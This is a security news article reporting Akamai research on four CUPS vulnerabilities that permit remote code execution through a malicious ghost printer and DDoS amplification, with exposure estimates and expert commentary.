Researchers at Akamai have recently uncovered a series of four vulnerabilities in the Common Unix Printing System (CUPS) that could lead to remote code execution (RCE) and facilitate distributed denial of service (DDoS) attacks.
These vulnerabilities, identified as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, were revealed at the end of September by researcher Simone Margaritelli, also known as evilsocket. Collectively, these flaws affect more than 76,000 devices, with estimates suggesting that the total number of vulnerable systems could exceed 198,000.
The vulnerabilities allow an attacker to exploit CUPS by adding a “ghost” printer with a malicious Internet Printing Protocol (IPP) URL to a vulnerable machine. Once this is achieved, the attacker can initiate a print job, thereby executing their code remotely.
However, Akamai’s researchers, including Larry Cashdollar, Kyle Lefton, and Chad Seaman, observed an additional risk: the potential for these vulnerabilities to be leveraged for launching DDoS attacks. While these DDoS attacks may not be as severe as RCE incidents, they can still lead to significant disruptions.
Akamai’s findings highlight the low resources needed for launching DDoS attacks through CUPS. Attackers can quickly co-opt numerous exposed CUPS services in mere seconds, and if they utilize a modern hyper-scaler platform, the cost could be less than one cent.
The attack’s initiation requires only a single crafted packet sent to a vulnerable CUPS service, effectively targeting another system while also draining the bandwidth and CPU resources of the CUPS server itself.
Researchers estimate that approximately 58,000 of the identified vulnerable devices could be exploited for DDoS attacks. Many of these devices are running outdated versions of CUPS, some as old as version 1.3 from 2007. This presents an opportunity for threat actors to amplify their DDoS efforts using older hardware.
If all vulnerable hosts were exploited in a coordinated campaign, they could generate up to 6GB of malicious traffic. While this amount may not be substantial by modern standards, it still poses a risk of disruption.
Akamai’s testing revealed alarming behaviors from active CUPS servers, such as continuously sending out requests after the initial interaction. This infinite beaconing could significantly increase the potential amplification of attacks.
The researchers warn that low-skilled attackers are likely to exploit these vulnerabilities, emphasizing the importance of proactive efforts to reduce the number of vulnerable devices exposed on the internet.
APIContext CEO Mayur Upadhyaya likened the CUPS vulnerability to an amplifier in a speaker system, illustrating how small signals can be transformed into overwhelming amounts of traffic, effectively drowning targeted systems in a flood of malicious requests.